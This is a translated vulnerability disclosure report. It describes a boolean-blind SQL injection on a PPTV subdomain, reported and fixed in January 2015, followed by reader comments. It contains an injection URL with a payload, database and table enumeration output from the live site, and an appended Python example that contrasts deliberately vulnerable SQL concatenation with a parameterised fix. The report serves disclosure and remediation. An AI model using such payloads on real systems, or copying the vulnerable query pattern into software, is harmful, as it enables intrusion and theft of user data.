
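Vulnerability summary

Bug ID: wooyun-2015-090129

Title: MySQL injection on a PPTV site (330,000 rows in the members table)

Vendor: PPTV (PPlive)

Author: lijiejie

Submitted: 2015-01-05 20:19

Fixed: 2015-01-07 14:35

Disclosed: 2015-01-07 14:35

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Fixed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]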



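Vulnerability details

Disclosure status:

2015-01-05: Details reported to the vendor; awaiting vendor handling
2015-01-06: Vendor confirmed; details disclosed to the vendor only
2015-01-07: Vendor fixed the vulnerability and proactively disclosed it; details made public

Brief description:

MySQL injection on a PPTV site (330,000 rows in the members table), MySQL bool blind.

Detailed description:

Injection point: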

http://ksf.zone.pptv.com/post?id=1 AND length(user())=19


The id parameter is injectable. MySQL bool blind.
There is also another domain: http://expo2010.pptv.com/

Proof of vulnerability:

current user:    'pp_ae@10.%'


available databases [10]:
[*] information_schema
[*] pp_hezuo_swarovski
[*] pp_zo_inyy
[*] pp_zo_vmei
[*] pp_zone
[*] pp_zone_public
[*] pplive_ctf
[*] pplive_heiren
[*] pplive_kefu
[*] pplive_rss


Tables in the kefu database:

Database: pplive_kefu
[103 tables]


The members table holds more than 300,000 rows:

Database: pplive_kefu
+-------------+---------+
| Table | Entries |
+-------------+---------+
| cdb_members | 331865 |
+-------------+---------+


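I stopped here and did not exploit it any further.

Fix:

Type conversion, filtering

Copyright notice: when reposting, please credit the source lijiejie@WooYun


Vendor response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-01-06 09:49

Vendor reply:

Thank you very much, we are arranging to have it handled

Latest status:

2015-01-07: Fixed. Thanks, everyone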
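The "type conversion, filtering" fix recommended above, shown beside the vulnerable pattern; this is an added example, not code from the report or from the vendor. The table, data and function names are constructed, SQLite stands in for MySQL so the block runs offline, and `length('abc')` stands in for the report's `length(user())`, which SQLite does not provide.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the site's post table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE post (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO post VALUES (1, 'hello')")
    return db


def get_post_vulnerable(db, raw_id):
    # 'Before': the id parameter is concatenated into the statement, so any
    # text after the number is parsed as SQL. A true appended condition
    # returns the row and a false one returns nothing; that difference in
    # the response is what makes the injection "boolean blind".
    return db.execute("SELECT title FROM post WHERE id=" + raw_id).fetchone()


def parse_id(raw_id):
    # Conversion + filtering: accept only a short run of ASCII digits,
    # then convert to int. Everything else is rejected before any query.
    if not (raw_id.isascii() and raw_id.isdigit()) or len(raw_id) > 10:
        raise ValueError("id must be a non-negative integer")
    return int(raw_id)


def get_post_safe(db, raw_id):
    # 'After': validated integer passed as a bound parameter, so the value
    # is never parsed as part of the SQL text.
    return db.execute(
        "SELECT title FROM post WHERE id=?", (parse_id(raw_id),)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 AND length('abc')=3", "1 AND length('abc')=4"):
        print(repr(value), "vulnerable ->", get_post_vulnerable(db, value))
        try:
            print(repr(value), "safe ->", get_post_safe(db, value))
        except ValueError as exc:
            print(repr(value), "safe -> rejected:", exc)
```
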


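Vulnerability rating:

Comments

  1. 2015-01-05 20:35 | 浅蓝 ( Regular white hat | Rank:274 Vulnerabilities:109 | 爱安全: www.ixsec.org Xsec community: zone.ixse...)

    Front row

  2. 2015-01-05 23:23 | X,D ( Regular white hat | Rank:143 Vulnerabilities:8 | X,D)

    Saving a seat

  3. 2015-01-08 09:43 | todaro ( Trainee white hat | Rank:39 Vulnerabilities:12 | Finished.)

    Once the front line gets long, the second- and third-level domains have all kinds of problems

  4. 2015-01-21 16:06 | Sofia ( Passerby | Rank:25 Vulnerabilities:6 | An SEOer who can't pentest is not a good webmaster)

    What would happen if he took the data?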